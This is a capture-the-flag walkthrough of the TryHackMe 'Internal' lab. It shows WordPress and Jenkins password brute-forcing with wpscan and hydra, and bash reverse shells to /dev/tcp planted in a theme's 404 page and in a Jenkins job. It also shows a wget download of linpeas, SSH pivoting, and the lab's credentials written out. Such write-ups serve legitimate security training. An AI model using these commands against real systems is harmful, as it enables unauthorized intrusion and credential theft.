Internal
Room Link: https://tryhackme.com/room/internal
Scanning
Initial Scan
nmap -A 10.10.46.54
Scan all ports
No other ports found.
nmap -p- 10.10.46.54
TCP/80 - HTTP
gobuster dir -u http://10.10.46.54 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt -t 30
Wordpress is running under both /blog and /wordpress. /blog has a login page
wpscan --url http://10.10.46.54
wpscan --url http://10.10.46.54/blog --passwords /usr/share/wordlists/rockyou.txt
Credentials found
Username: admin
Password: my2boysTrying to login the page redirects to internal.htm so I add that to the host file.
vi /etc/hosts
We are able to successfully get into wordpress with the credentials
Reverse Shell Failed Attempt
revshell.php code
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.120.18/443 0>&1'");
?>vi revshell.php
zip revshell.zip revshell.php
nc -lvnp 443
Unable to upload the plugin due to write issues
Reverse Shell
TWENTY SEVENTEEN theme had a writable pages so I modified the 404 page with a reverse shell and then navigated to a page that does not exist.
Just added the revshell.php code mentioned earlier.
Kali
nc -lvnp 443Browser
A page that doesn't exist to trigger the reverse shell.
http://www.internal.thm/blog/index.php/2020/08/03/hello-worlgd/
Get full TTY shell
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgLinPeas
Kali
python2 -m SimpleHTTPServer 81Victim
cd /tmp/
wget http://10.10.120.18:81/linpeas.sh
chmod +x linpeas.sh
./linpeas.shLinpeas was able to find two sets of credentials. phpmyadmin credentials worked.
phpmyadmin
Username: phpmyadmin
Password: B2Ud4fEOZmVq
note
Username: aubreanna
Password: bubb13guM!@#123The note for Bill
cat /opt/wp-save.txt 
Able to ssh in with the credentials. There is a file that says that Jenkins is running and we can confirm that is is running with netstat as well.
ssh aubreanna@10.10.46.54
Password: bubb13guM!@#123
cat jenkins.txt
netstat -tuan
Pivot
From Kali I am now able to reach the Jenkins server
Option #1
For the rest of guide I used this option.
apt install sshuttle
sshuttle -r aubreanna@10.10.46.54 127.0.0.1/24
Password: bubb13guM!@#123
Option #2
If I followed this way jenkins would be redirected to port 4444 on kali.
ssh -L 4444:172.17.0.2:8080 aubreanna@10.10.46.54
Password: bubb13guM!@#123Bruteforce
After checking for some time I couldn't find any files with credentials that worked and the jenkins server is being ran on docker and I had no access to anything for that so I resorted to using hydra. What I did was tried logging in with fake credentials than seeing the request and copying the info I needed to start bruteforcing.
File: /j_acegi_security_check
Request Body: j_username=test&j_password=pass&from=%2F&Submit=Sign+in
Failed login message: Invalid username or password
The default hydra was giving false positives and not getting the correct credentials so I downloaded from gitlab and ran the bruteforcing again.
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra/
./configure
make
make install
./hydra 127.0.0.1 -s 8080 -V -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -l admin -P /usr/share/wordlists/rockyou.txtCredentials were found.
Username: admin
Password: spongebobJenkins Web
Just added a reverse shell to the job and ran it.
/bin/bash -c 'bash -i >& /dev/tcp/10.10.120.18/443 0>&1'
Kali
Setup a listener
nc -lvnp 443
Privilege Escalation
There was a note under opt for Aubreanna that had the credentials for root.
Username: root
Password: tr0ub13guM!@#123Tried logging in with the credentials with ssh and it worked.
ssh root@10.10.56.152
Password: tr0ub13guM!@#123Last updated